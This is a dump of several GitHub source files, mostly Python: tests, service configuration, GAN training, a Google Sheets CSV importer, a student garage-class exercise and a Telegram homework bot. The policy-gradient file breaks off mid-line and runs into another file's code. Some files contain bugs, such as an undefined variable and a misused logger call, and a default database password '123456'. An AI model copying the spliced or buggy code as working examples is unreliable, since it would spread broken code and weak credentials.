+{"seq_id":"42684658149","text":"# -*- coding: utf-8 -*-\n\nfrom scout.commands import cli\n\nfrom scout.server.extensions import store\n\ndef test_view_diseases(mock_app):\n \"\"\"Test CLI that shows all collections in the database\"\"\"\n\n runner = mock_app.test_cli_runner()\n assert runner\n\n # Test CLI\n result = runner.invoke(cli, ['view', 'collections'])\n assert result.exit_code == 0\n assert \"collections\\nexon\\nhpo_term\\ninstitute\\ncase\\nhgnc_gene\\nuser\\ngene_panel\\nvariant\\ntranscript\\nevent\\n\" in result.output\n","repo_name":"Clinical-Genomics-Lund/scout","sub_path":"tests/commands/view/test_view_collections_cmd.py","file_name":"test_view_collections_cmd.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"31655244038","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\nfrom urllib.parse import quote_plus\nimport base64\nfrom configparser import ConfigParser\n_get_module_path = lambda path: os.path.normpath(os.path.join(os.getcwd(),os.path.dirname(__file__), path))\n\ndef digit_int_from_env(envname, default=0):\n if envname not in os.environ:\n return default\n s=os.environ[envname]\n if s.isdigit():\n return int(s)\n else:\n return default\n\ndef mem_int_from_env(envname, default=100*(2**20)):\n if envname not in os.environ:\n return default\n s=os.environ[envname]\n if s.isdigit():\n return int(s)\n unit = s[-2:]\n val = s[:-2]\n if not val.isdigit():\n return default\n val = int(val)\n if unit == 'Ki':\n return val*(2**10)\n if unit == 'Mi':\n return val*(2**20)\n if unit == 'Gi':\n return val*(2**30)\n else:\n return default\n\ndef read_config_infile(section, config_path=\"\"):\n cfg = ConfigParser()\n cfg.read(config_path)\n if section in cfg.sections():\n return cfg[section]\n else:\n cfg[section] = dict()\n return cfg[section]\n\n#service_type 支持四种类型:all、fast-text-analysis、common-classify、image-summary\nservice_type = os.environ.get('SERVICE_TYPE','all')\nserver_port = digit_int_from_env('SERVER_PORT', 9528)\npredata_path = _get_module_path('predata/similarity_data_list.json')\nstopwords_path = _get_module_path('predata/stop_words.txt')\nservice_code = os.environ.get('service_code','001')\n\n#启用的子工作进程个数.\n#默认: 4。\n#1个工作进程每秒可以处理75K字/s。对于压力较大的场景可以将适当调高。\nworker_processes = mem_int_from_env('WORKER_PROCESSES', default = 1)\n\n#每个工作子进程最大允许使用的内存大小,默认4GB\nmax_mem_use = mem_int_from_env('MAX_MEM_USE', default = 4*(2**30))\n\n#最大允许堆积的body字节数:默认为最大内存占用的1/8\nmax_stock_body_size = mem_int_from_env('MAX_STOCK_BODY_SIZE', default = max_mem_use/8)\n\n#最大允许处理的单个文本长度\n#1024*(2**20)是pandora无负载允许时占用的内存\n#max_stock_body_size是分配给多并发下body缓存的内存\n#50是根据测试经验得到,处理1M字的文本,会占用50MB的空间大小\nmax_content_len = mem_int_from_env('MAX_CONTENT_LEN', default = (max_mem_use-1024*(2**20)-max_stock_body_size)/50)\n\n#为每个请求分配的最大缓存大小\nmax_buffer_size = mem_int_from_env('MAX_BUFFER_SIZE', default = 100*(2**20))\n\n#最大的body大小, 默认是最大允许堆积body字节数。\nmax_body_size = mem_int_from_env('MAX_BODY_SIZE', default = max_stock_body_size)\n\n#mongo配置与milvus配置\nconfig_path = os.environ.get(\"config_path\", \"/root/server.conf\")\nmongodb_conf = read_config_infile(\"mongodb\", config_path=config_path)\nmongo_config = dict(\n host=mongodb_conf.get('host', \"aladdin-cas-mongo\").replace('\"', ''),\n port=int(mongodb_conf.get('port', \"27017\").replace('\"', '')),\n db_auth=mongodb_conf.get(\"db_auth\", \"admin\").replace('\"', ''),\n db=mongodb_conf.get(\"db\", \"aladdin-cas\").replace('\"', ''),\n user=quote_plus(mongodb_conf.get(\"user\", \"\").replace('\"', '')),\n password=quote_plus(mongodb_conf.get(\"password\", \"\").replace('\"', '')),\n replicaSet=quote_plus(mongodb_conf.get(\"replicaSet\", \"\").replace('\"', '')),\n sslCAFile=quote_plus(mongodb_conf.get(\"sslCAFile\", \"\").replace('\"', '')),\n ssl=quote_plus(mongodb_conf.get(\"ssl\", \"\").replace('\"', '')),\n options=mongodb_conf.get(\"options\", str(dict())).strip(),\n)\nmilvus_config = dict(\n host=os.environ.get('milvus_host','127.0.0.1'),\n port=os.environ.get('milvus_port',19530),\n)\n# milvus_od_collection = os.environ.get(\"milvus_od_collection\", \"object_detection\")\n# mongo_od_collection = os.environ.get(\"mongo_od_collection\", \"object_detection\")\n#用于敏感文件标记的mysql配置\n\nmysql_config = dict(\n host=os.environ.get('mysql_host','127.0.0.1'),\n port=int(os.environ.get('mysql_port', 3306)),\n user=quote_plus(os.environ.get('mysql_user','root')),\n db='atf_db',\n password=quote_plus(os.environ.get('mysql_password', '123456')),\n #charset='utf8'\n)\n\ntfserving_config = dict(\n tfserving_host=os.environ.get(\"tfserving_host\", \"127.0.0.1\"),\n tfserving_port=os.environ.get(\"tfserving_port\", \"8500\")\n)\n\nglobalization_lang = \"en_US\"\n\n# exception_level\n# 0 code, message, cause, detail\n# 1 code, message, cause\n# 2 code, message\n# 3 code, cause, detail\n# 4 code, cause\nexception_level = int(os.environ.get(\"exception_level\", 0))\n\n# 目标检测的阈值\ndetection_confidence_threshold = float(os.environ.get(\"detection_confidence_threshold\", 0.6))\n#tfserving 目标检测模型名称\ndetection_model_name= os.environ.get(\"detection_model_name\", \"detection\")\n#tfserving 图像分类模型名称\nclassify_model_name= os.environ.get(\"classify_model_name\", \"fbnetv2\")\n\nelasticsearch_conf = read_config_infile(\"elasticsearch\", config_path=config_path)\nelasticsearch_config = dict(\n host=elasticsearch_conf.get('host', \"aladdin-cas-es\").replace('\"', ''),\n port=int(elasticsearch_conf.get('port', \"9200\").replace('\"', '')),\n aliases=elasticsearch_conf.get('aliases', \"delg\").replace('\"', ''),\n index_num=int(elasticsearch_conf.get('index_num', \"128\").replace('\"', '')),\n index_type=int(elasticsearch_conf.get('index_type', \"0\").replace('\"', '')),\n)\n\ndl_inference_server_conf = read_config_infile(\"dl-inference-server\", config_path=config_path)\ndl_inference_server_config = dict(\n host=dl_inference_server_conf.get('host', \"aladdin-cas-dl\").replace('\"', ''),\n port=int(dl_inference_server_conf.get('port', \"8500\").replace('\"', '')),\n)\n\ndelg_conf = read_config_infile(\"delg-codebook\", config_path=config_path)\ndelg_config = dict(\n global_path_1=delg_conf.get(\"global_path_1\", \"\").replace('\"', ''),\n global_path_2=delg_conf.get(\"global_path_2\", \"\").replace('\"', ''),\n local_path_1=delg_conf.get(\"local_path_1\", \"\").replace('\"', ''),\n local_path_2=delg_conf.get(\"local_path_2\", \"\").replace('\"', ''),\n)\n","repo_name":"zhangxiaoyuan1988/aladdin","sub_path":"aladdin-cas/src/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17115600213","text":"import os\n\nfrom itertools import chain\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\nimport numpy as np\nfrom dataloader import npyDataset2d\nfrom model import Generator, Discriminator, ContentEncoder, StyleEncoder\nfrom utils import Tanhize \nfrom hparams import get_hparams\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nlambda_cy = 10 \nlambda_f = 1 \nlambda_s = 1 \nlambda_c = 1 \n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\ndef get_z_random(batch, dim1):\n\n z = torch.randn(batch, dim1).cuda()\n\n return z \n\n\ndef recon_criterion(x,y):\n return torch.mean(torch.abs(x-y))\n\n \ndef train():\n\n hparams = get_hparams()\n model_path = os.path.join( hparams.model_path, hparams.task_name, hparams.spec_opt )\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n\n # Load Dataset Loader\n\n\n normalizer_clean = Tanhize('clean')\n normalizer_noisy = Tanhize('noisy')\n\n\n \n print('Load dataset2d loader')\n dataset_A_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_A_2d, hparams.frame_len, normalizer = normalizer_noisy)\n dataset_B_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_B_2d, hparams.frame_len, normalizer = normalizer_clean)\n \n dataloader_A = DataLoader(dataset_A_2d, batch_size = hparams.batch_size,\n shuffle = True,\n drop_last = True,\n )\n dataloader_B = DataLoader(dataset_B_2d, batch_size = hparams.batch_size,\n shuffle = True,\n drop_last = True,\n )\n \n \n # Load Generator / Disciminator model\n generator_A = Generator()\n generator_B = Generator()\n\n discriminator_A = Discriminator()\n discriminator_B = Discriminator()\n\n ContEncoder_A = ContentEncoder()\n ContEncoder_B = ContentEncoder()\n\n StEncoder_A = StyleEncoder()\n StEncoder_B = StyleEncoder()\n\n\n generator_A.apply(weights_init)\n generator_B.apply(weights_init) \n\n discriminator_A.apply(weights_init) \n discriminator_B.apply(weights_init) \n\n ContEncoder_A.apply(weights_init)\n ContEncoder_B.apply(weights_init)\n\n StEncoder_A.apply(weights_init)\n StEncoder_B.apply(weights_init)\n\n \n real_label = 1\n fake_label = 0\n real_tensor = Variable(torch.FloatTensor(hparams.batch_size))\n _ = real_tensor.data.fill_(real_label)\n\n fake_tensor = Variable(torch.FloatTensor(hparams.batch_size))\n _ = fake_tensor.data.fill_(fake_label)\n \n # Define Loss function\n d = nn.MSELoss()\n bce = nn.BCELoss()\n\n # Cuda Process\n if hparams.cuda == True:\n print('-- Activate with CUDA --')\n\n generator_A = nn.DataParallel(generator_A).cuda()\n generator_B = nn.DataParallel(generator_B).cuda()\n discriminator_A = nn.DataParallel(discriminator_A).cuda()\n discriminator_B = nn.DataParallel(discriminator_B).cuda()\n ContEncoder_A = nn.DataParallel(ContEncoder_A).cuda()\n ContEncoder_B = nn.DataParallel(ContEncoder_B).cuda()\n StEncoder_A = nn.DataParallel(StEncoder_A).cuda()\n StEncoder_B = nn.DataParallel(StEncoder_B).cuda()\n\n d.cuda()\n bce.cuda()\n real_tensor = real_tensor.cuda()\n fake_tensor = fake_tensor.cuda()\n\n else:\n print('-- Activate without CUDA --')\n\n \n\n\n gen_params = chain(\n generator_A.parameters(),\n generator_B.parameters(),\n ContEncoder_A.parameters(),\n ContEncoder_B.parameters(),\n StEncoder_A.parameters(),\n StEncoder_B.parameters(),\n )\n\n dis_params = chain(\n discriminator_A.parameters(), \n discriminator_B.parameters(), \n )\n\n optimizer_g = optim.Adam( gen_params, lr=hparams.learning_rate)\n optimizer_d = optim.Adam( dis_params, lr=hparams.learning_rate)\n\n iters = 0\n for e in range(hparams.epoch_size):\n\n \n # input Tensor \n\n A_loader, B_loader = iter(dataloader_A), iter(dataloader_B)\n \n for i in range(len(A_loader)-1):\n \n batch_A = A_loader.next()\n batch_B = B_loader.next()\n\n A_indx = torch.LongTensor(list( range(hparams.batch_size)))\n B_indx = torch.LongTensor(list( range(hparams.batch_size)))\n\n\n A_ = torch.FloatTensor(batch_A) \n B_ = torch.FloatTensor(batch_B)\n\n if hparams.cuda == True:\n \n\n x_A = Variable(A_.cuda())\n x_B = Variable(B_.cuda())\n\n\n else:\n x_A = Variable(A_)\n x_B = Variable(B_)\n\n real_tensor.data.resize_(hparams.batch_size).fill_(real_label)\n fake_tensor.data.resize_(hparams.batch_size).fill_(fake_label)\n\n \n \n\n ## Discrominator Update Steps\n\n discriminator_A.zero_grad()\n discriminator_B.zero_grad()\n\n # x_A, x_B, x_AB, x_BA\n # [#_batch, max_time_len, dim]\n\n A_c = ContEncoder_A(x_A).detach()\n B_c = ContEncoder_B(x_B).detach()\n\n # A,B : N ~ (0,1)\n A_s = Variable(get_z_random(hparams.batch_size, 8))\n B_s = Variable(get_z_random(hparams.batch_size, 8))\n \n\n x_AB = generator_B(A_c, B_s).detach()\n x_BA = generator_A(B_c, A_s).detach()\n\n\n\n # We recommend LSGAN-loss for adversarial loss\n \n l_d_A_real = 0.5 * torch.mean( (discriminator_A(x_A) - real_tensor) **2 ) \n l_d_A_fake = 0.5 * torch.mean( (discriminator_A(x_BA) - fake_tensor) **2 )\n\n l_d_B_real = 0.5 * torch.mean( (discriminator_B(x_B) - real_tensor)** 2) \n l_d_B_fake = 0.5 * torch.mean( (discriminator_B(x_AB) - fake_tensor) ** 2)\n\n\n l_d_A = l_d_A_real + l_d_A_fake\n l_d_B = l_d_B_real + l_d_B_fake\n\n\n l_d = l_d_A + l_d_B \n \n l_d.backward()\n optimizer_d.step()\n \n\n ## Generator Update Steps\n\n generator_A.zero_grad()\n generator_B.zero_grad()\n ContEncoder_A.zero_grad()\n ContEncoder_B.zero_grad()\n StEncoder_A.zero_grad()\n StEncoder_B.zero_grad()\n\n A_c = ContEncoder_A(x_A)\n B_c = ContEncoder_B(x_B)\n\n A_s_prime = StEncoder_A(x_A)\n B_s_prime = StEncoder_B(x_B)\n \n\n # A,B : N ~ (0,1)\n A_s = Variable(get_z_random(hparams.batch_size, 8))\n B_s = Variable(get_z_random(hparams.batch_size, 8))\n \n\n x_BA = generator_A(B_c, A_s)\n x_AB = generator_B(A_c, B_s)\n\n x_A_recon = generator_A(A_c, A_s_prime)\n x_B_recon = generator_B(B_c, B_s_prime)\n\n\n B_c_recon = ContEncoder_A(x_BA)\n A_s_recon = StEncoder_A(x_BA)\n\n A_c_recon = ContEncoder_B(x_AB)\n B_s_recon = StEncoder_B(x_AB)\n\n\n \n x_ABA = generator_A(A_c_recon, A_s_prime)\n x_BAB = generator_B(B_c_recon, B_s_prime)\n\n l_cy_A = recon_criterion(x_ABA, x_A)\n l_cy_B = recon_criterion(x_BAB, x_B)\n\n l_f_A = recon_criterion(x_A_recon, x_A)\n l_f_B = recon_criterion(x_B_recon, x_B)\n\n l_c_A = recon_criterion(A_c_recon, A_c)\n l_c_B = recon_criterion(B_c_recon, B_c)\n\n l_s_A = recon_criterion(A_s_recon, A_s)\n l_s_B = recon_criterion(B_s_recon, B_s)\n\n\n # We recommend LSGAN-loss for adversarial loss\n \n l_gan_A = 0.5 * torch.mean( (discriminator_A(x_BA) - real_tensor) **2)\n l_gan_B = 0.5 * torch.mean( (discriminator_B(x_AB) - real_tensor ) **2)\n\n l_g = l_gan_A + l_gan_B + lambda_f *( l_f_A + l_f_B) + lambda_s * (l_s_A + l_s_B) + lambda_c * (l_c_A + l_c_B) + lambda_cy * ( l_cy_A + l_cy_B)\n\n l_g.backward()\n optimizer_g.step()\n\n \n\n if iters % hparams.log_interval == 0:\n print (\"---------------------\")\n\n print (\"Gen Loss :{} disc loss :{}\".format(l_g/hparams.batch_size , l_d/hparams.batch_size))\n print (\"epoch :\" , e , \" \" , \"total \", hparams.epoch_size)\n print (\"iteration :\", iters )\n\n if iters % hparams.model_save_interval == 0:\n torch.save( generator_A.state_dict(), os.path.join(model_path, 'model_gen_A_{}.pth'.format(iters)))\n torch.save( generator_B.state_dict(), os.path.join(model_path, 'model_gen_B_{}.pth'.format(iters)))\n torch.save( discriminator_A.state_dict(), os.path.join(model_path, 'model_dis_A_{}.pth'.format(iters)))\n torch.save( discriminator_B.state_dict(), os.path.join(model_path, 'model_dis_B_{}.pth'.format(iters)))\n\n torch.save( ContEncoder_A.state_dict(), os.path.join(model_path, 'model_ContEnc_A_{}.pth'.format(iters)))\n torch.save( ContEncoder_B.state_dict(), os.path.join(model_path, 'model_ContEnc_B_{}.pth'.format(iters)))\n torch.save( StEncoder_A.state_dict(), os.path.join(model_path, 'model_StEnc_A_{}.pth'.format(iters)))\n torch.save( StEncoder_B.state_dict(), os.path.join(model_path, 'model_StEnc_B_{}.pth'.format(iters)))\n\n iters += 1\n \nif __name__ == '__main__':\n train()\n\n","repo_name":"vivivic/speech-domain-adaptation-DRL","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"} +{"seq_id":"27930543512","text":"import csv\nimport gspread\nfrom gspread import utils\nfrom io import StringIO\nfrom typing import Union, Optional\n\nfrom .utils.conf import load_config\nfrom .utils.credentials import load_credentials_from_json, load_credentials_from_dict\n\n\nCSV_SNIFFER_BUFFER_SIZE = 4096\n\n\ndef import_csv(source: Optional[Union[str, StringIO]] = None,\n url: Optional[str] = None,\n cell: Optional[str] = None,\n credentials: Optional[Union[str, dict]] = None,\n config: Optional[Union[str, dict]] = None) -> dict:\n \"\"\"\n Import CSV file to Google sheet\n\n :param source: path to source CSV file or StringIO object\n :param url: destination sheet url\n :param cell: destination sheet cell (can include tab name: 'MyTab!A1')\n :param credentials: path to google service account credentials file or dict\n :param config: path to config file or dict\n :return: Google Sheet API response object\n \"\"\"\n settings = load_config(config) if isinstance(config, str) else None\n if settings is None and (source is None or url is None or credentials is None):\n raise ValueError('required parameters missed')\n\n csv_sniffer_buffer_size = CSV_SNIFFER_BUFFER_SIZE\n\n if settings is not None:\n source = settings.get('source', source)\n url = settings.get('url', url)\n cell = settings.get('cell', 'A1')\n credentials = settings.get('credentials', credentials)\n csv_sniffer_buffer_size = settings.get('csv_sniffer_buffer_size', CSV_SNIFFER_BUFFER_SIZE)\n\n cell = cell if cell is not None else 'A1'\n\n # TODO: add other types of credentials\n if isinstance(credentials, dict):\n credentials = load_credentials_from_dict(credentials)\n elif isinstance(credentials, str):\n credentials = load_credentials_from_json(credentials)\n else:\n credentials = None\n\n if credentials is None:\n raise ValueError('invalid credentials')\n\n if isinstance(source, str):\n try:\n infile = open(source, 'r')\n dialect = csv.Sniffer().sniff(infile.read(csv_sniffer_buffer_size))\n infile.seek(0)\n csv_data = infile.read()\n except Exception as e:\n raise ValueError(f'source file error {str(e)}')\n elif isinstance(source, StringIO):\n dialect = csv.Sniffer().sniff(source.read(csv_sniffer_buffer_size))\n source.seek(0)\n csv_data = source.read()\n else:\n raise ValueError('not supported source type')\n\n gc = gspread.authorize(credentials)\n sheet = gc.open_by_url(url)\n\n if '!' in cell:\n tab_name, cell = cell.split('!')\n worksheet = sheet.worksheet(tab_name)\n clear_range = f'{tab_name}!'\n else:\n worksheet = sheet.sheet1\n clear_range = ''\n\n # clear old values in the sheet\n row_col = utils.rowcol_to_a1(worksheet.row_count, worksheet.col_count)\n clear_range = f'{clear_range}A1:{row_col}'\n sheet.values_clear(clear_range)\n\n first_row, first_column = utils.a1_to_rowcol(cell)\n\n body = {\n 'requests': [{\n 'pasteData': {\n \"coordinate\": {\n \"sheetId\": worksheet.id,\n \"rowIndex\": first_row - 1,\n \"columnIndex\": first_column - 1,\n },\n \"data\": csv_data,\n \"type\": 'PASTE_NORMAL',\n \"delimiter\": dialect.delimiter\n }\n }]\n }\n\n return sheet.batch_update(body)\n","repo_name":"dlancer/csv-export-gsheets","sub_path":"csv_export_gsheets/gsheet.py","file_name":"gsheet.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5719794646","text":"import numpy as np\nimport lqg1d\nimport matplotlib.pyplot as plt\nimport utils\nfrom cartpole import CartPoleEnv\n\nclass ConstantStep(object):\n def __init__(self, learning_rate):\n self.learning_rate = learning_rate\n\n def update(self, gt):\n return self.learning_rate * gt\n\n\nclass AnnealingStep(object):\n def __init__(self, learning_rate):\n self.learning_rate = learning_rate\n self.count = 10\n\n def update(self, gt):\n self.count += 1\n return self.learning_rate * gt / self.count\n\n\nclass AdamStep(object):\n def __init__(self, learning_rate):\n self.beta1=0.9\n self.beta2=0.999\n self.eps=1e-8\n self.alpha = learning_rate\n self.m_old = 0\n self.v_old = 0\n self.betaT1 = self.beta1\n self.betaT2 = self.beta2\n\n\n def update(self, gt):\n mt = self.beta1*self.m_old + (1-self.beta1) * gt\n vt = self.beta2*self.v_old + (1-self.beta2) * (gt*gt)\n m_hat = mt/(1-self.betaT1)\n v_hat = vt/(1-self.betaT2)\n self.betaT1 *= self.beta1\n self.betaT2 *= self.beta2\n return self.alpha * m_hat / (np.sqrt(v_hat)+self.eps)\n\n\n#####################################################\n# Define the environment and the policy\n#####################################################\nenv = CartPoleEnv()\n\n\nclass Policy(object):\n def __init__(self):\n self.theta = np.zeros(8)\n self.K = 1.0\n\n def draw_action(self, state):\n if np.random.random()\".format(self.capacity, self.speed, self.number)\n\n# \tdef __eq__(self, other):\n# \t\treturn type(other) == type(self) and self.number == other.number\n\n# \tdef __hash__(self):\n# \t\treturn hash(self.capacity * self.speed * len(self.number))\n\n# a = Car(100, 100, \"asd\")\n# b = Car(100, 100, \"zzz\")\n# c = Car(200, 50, \"asd\")\n\n# # Эти не равны\n# print(a == b)\n# # Эти равны\n# print(a == c)\n\n# print(a == None)\n# print(a == 1)\n\n# s = set()\n# s.add(a)\n# s.add(b)\n# s.add(c)\n# s.add(a)\n# s.add(a)\n\n# # Ожидаем увидеть номера двух машин,\n# # так как всё остальное в описанной логике является дублями\n# print(\"=== Cars in set ===\")\n# for z in sorted(s, key=lambda e: e.number):\n# print(z.number)\n\n# class RaceCar(Car):\n# \tdef __init__(self, v):\n# \t\tself.capacity = 0\n# \t\tself.speed = v\n# \t\tself.number = None\n# \t\t# self = Car(0, v, None)\n\n# c = Car(1, 2, 3)\n# print(c)\n# r = RaceCar(10)\n# print(r.capacity)\n\n# class MoneyBox:\n# \tdef __init__(self):\n# \t\tself.money = 0\n# \t\tself.coins = 0\n\n# \tdef add_coin(self, value):\n# \t\tself.money += value\n# \t\tself.coins += 1\n\n# \tdef get_coins_number(self):\n# \t\treturn self.coins\n\n# \tdef get_coins_value(self):\n# \t\treturn self.money\n\n# m = MoneyBox()\n# # Добавили монетку достоинством 10\n# m.add_coin(10)\n# # Добавили монетку достоинством 5\n# m.add_coin(5)\n\n# # Ожидаем, что монеток внутри 2 штуки\n# print(m.get_coins_number())\n# # Ожидаем, что общее достоинство всех монеток 15\n# print(m.get_coins_value())\n\nclass Car:\n def __init__(self, c, s, n):\n self.capacity = int(c)\n self.speed = int(s)\n self.number = n\n\n# Грузовик\nclass Truck(Car):\n pass\n\n# Автобус\nclass Bus(Car):\n pass\n\nclass Garage:\n\tdef __init__(self):\n\t\tself.cars = []\n\t\tself.trucks = []\n\t\tself.buses = []\n\n\tdef park(self, v):\n\t\tif(type(v) == Car):\n\t\t\tself.cars.append(v)\n\t\telif(type(v) == Truck):\n\t\t\tself.trucks.append(v)\n\t\t\tself.cars.append(v)\n\t\telif(type(v) == Bus):\n\t\t\tself.buses.append(v)\n\t\t\tself.cars.append(v)\n\n\tdef count(self, t):\n\t\tif(t == Car):\n\t\t\treturn len(self.cars)\n\t\tif(t == Truck):\n\t\t\treturn len(self.trucks)\n\t\tif(t == Bus):\n\t\t\treturn len(self.buses)\n\n\tdef get_fastest_of_type(self, t):\n\t\tif(t == Car):\n\t\t\treturn max(self.cars, key = lambda vehicle : vehicle.speed)\n\t\tif(t == Truck):\n\t\t\treturn max(self.trucks, key = lambda vehicle : vehicle.speed)\n\t\tif(t == Bus):\n\t\t\treturn max(self.buses, key = lambda vehicle : vehicle.speed)\n\ng = Garage()\n# Паркуем машины\ng.park(Car(1, 100, \"abc\"))\ng.park(Truck(1000, 150, \"zzz\"))\ng.park(Bus(100, 50, \"QWE\"))\ng.park(Bus(100, 80, \"ASD\"))\ng.park(Bus(100, 20, \"ZXC\"))\n\n# Сколько всего машин? Ожидаем 5, потому что грузовик и автобус - тоже машины.\nprint(g.count(Car))\n# Сколько всего грузовиков? Ожидаем 1.\nprint(g.count(Truck))\n# Сколько всего автобусов? Ожидаем 3.\nprint(g.count(Bus))\n# Получим самую быструю машину и выведем её номер. Ожидаем zzz, потому что грузовик внезапно самый быстрый.\nprint(g.get_fastest_of_type(Car).number)\n# Получим самый быстрый гру��овик и выведем его номер. Ожидаем zzz.\nprint(g.get_fastest_of_type(Truck).number)\n# Получим самый быстрый автобус и выведем его номер. Ожидаем ASD.\nprint(g.get_fastest_of_type(Bus).number)","repo_name":"FlyingPotato-131/python-labs","sub_path":"3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4671272995","text":"import sys\nimport time\nimport http\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nimport telegram\nimport requests\n\nfrom constants import (\n ENDPOINT,\n PRACTICUM_TOKEN,\n TELEGRAM_TOKEN,\n TELEGRAM_CHAT_ID,\n RETRY_TIME,\n HEADERS,\n HOMEWORK_STATUSES)\nfrom exceptions import EmptyResponse, UnreachableTelegram\n\n\nlogger = logging\n\n\ndef send_message(bot, message):\n \"\"\"Отправляем сообщение в Telegram.\"\"\"\n try:\n bot.send_message(TELEGRAM_CHAT_ID, message)\n except telegram.TelegramError:\n logger.error('Сбой при отправке сообщения')\n raise UnreachableTelegram('В данный момент Telegram недоступен')\n logger.info(f'Отправка сообщения: {message}')\n\n\ndef get_api_answer(current_timestamp):\n \"\"\"Делаем запрос к API.\"\"\"\n timestamp = current_timestamp or int(time.time())\n params = {'from_date': timestamp}\n result = dict()\n response = requests.get(ENDPOINT, headers=HEADERS, params=params)\n if response.status_code == http.HTTPStatus.OK:\n try:\n result = response.json()\n return result\n except Exception as error:\n logger.error(error, exc_info=True)\n elif response.status_code in (\n http.HTTPStatus.INTERNAL_SERVER_ERROR,\n http.HTTPStatus.NETWORK_AUTHENTICATION_REQUIRED):\n logger.error('Код статуса в диапазоне 500')\n raise requests.exceptions.ConnectionError\n elif response.status_code == http.HTTPStatus.REQUEST_TIMEOUT:\n logger.error('Код статуса 408')\n raise requests.exceptions.ReadTimeout\n logger.error(f'Сбой в работе программы: Эндпоинт'\n f'{ENDPOINT} недоступен.'\n f'Код ответа API: {response.status_code}')\n\n\ndef check_response(response):\n \"\"\"Проверяем ответ на соответствие типам данных Python.\"\"\"\n if not isinstance(response, dict):\n logger.error('Тип ответа не словарь')\n raise TypeError('Тип ответа не словарь')\n elif 'homeworks' not in response or 'current_date' not in response:\n logger.error('Отсутствуют ключи \"homeworks\" или \"current_date')\n raise EmptyResponse(response)\n elif not isinstance(response.get('homeworks'), list):\n logger.error('\"homeworks\" не список')\n raise TypeError('\"homeworks\" не список')\n return response['homeworks']\n\n\ndef parse_status(homework):\n \"\"\"На основе данных формируем вердикт о статусе работы.\"\"\"\n homework_name = homework.get('homework_name')\n homework_status = homework.get('status')\n if HOMEWORK_STATUSES.get(homework_status) is not None:\n verdict = HOMEWORK_STATUSES.get(homework_status)\n return f'Изменился статус проверки работы \"{homework_name}\". {verdict}'\n raise KeyError('Неизвестный статус')\n\n\ndef check_tokens():\n \"\"\"Проверяем наличие всех токенов.\"\"\"\n return all([\n PRACTICUM_TOKEN,\n TELEGRAM_TOKEN,\n TELEGRAM_CHAT_ID\n ])\n\n\ndef main():\n \"\"\"Основная логика работы бота.\"\"\"\n HOME_STATUS = dict()\n LAST_ERROR = None\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n current_timestamp = int(time.time())\n send_message(bot, 'Бот активирован.')\n print('Activation')\n while True:\n try:\n check = check_tokens()\n if check:\n api = get_api_answer(current_timestamp)\n current_timestamp = api['current_date']\n homeworks = check_response(api)\n if len(homeworks) > 0:\n status = homeworks[0]['status']\n if HOME_STATUS != status:\n message = parse_status(homeworks[0])\n send_message(bot, message)\n HOME_STATUS = status\n else:\n logger.info('Нет изменений в статусе работы')\n else:\n logger.debug('Response is empty')\n else:\n logger.CRITICAL('There is not any enviroment variable')\n sys.exit('Отсутствуют переменные окружения')\n\n except Exception as error:\n message = f'Сбой в работе программы: {error}'\n logger.error(message)\n if LAST_ERROR != error:\n send_message(bot, message)\n LAST_ERROR = error\n finally:\n time.sleep(RETRY_TIME)\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n level=logging.DEBUG,\n stream=sys.stdout,\n format='%(asctime)s, %(levelname)s, %(message)s, %(name)s')\n\n handler = RotatingFileHandler(\n 'my_logger.log',\n maxBytes=50000000,\n encoding='UTF-8',\n backupCount=5)\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n handler.setFormatter(formatter)\n main()\n","repo_name":"PVasily/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18903446839","text":"import pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n#Returns ensembled prediction accuracy as a function of the number of models\ndef ensemble(predictions,weights,target):\n acc_list = []\n for i in range(len(predictions)):\n ens_preds = final_preds(predictions[:(i+1)],weights[:(i+1)])\n acc_list.append(accuracy_score(target,ens_preds))\n return acc_list\n\npreds_inpath = '../Data/predictions.txt'\nwts1_inpath = '../Data/weights1.txt'\nwts2_inpath = '../Data/weights2.txt'\nwts3_inpath = '../Data/weights3.txt'\nwts4_inpath = '../Data/weights4.txt'\ntest_target_inpath = '../Data/test_target.csv'\nfigure_path = '../Figures/ensemble_accs.jpg'\n\nwith open(pred_inpath,'rb') as fp:\n predictions = pickle.load(fp)\nwith open(wts1_inpath,'rb') as fp:\n weights1 = pickle.load(fp)\nwith open(wts2_inpath,'rb') as fp:\n weights2 = pickle.load(fp)\nwith open(wts3_inpath,'rb') as fp:\n weights3 = pickle.load(fp)\nwith open(wts4_inpath,'rb') as fp:\n weights4 = pickle.load(fp)\n\ntest_target = 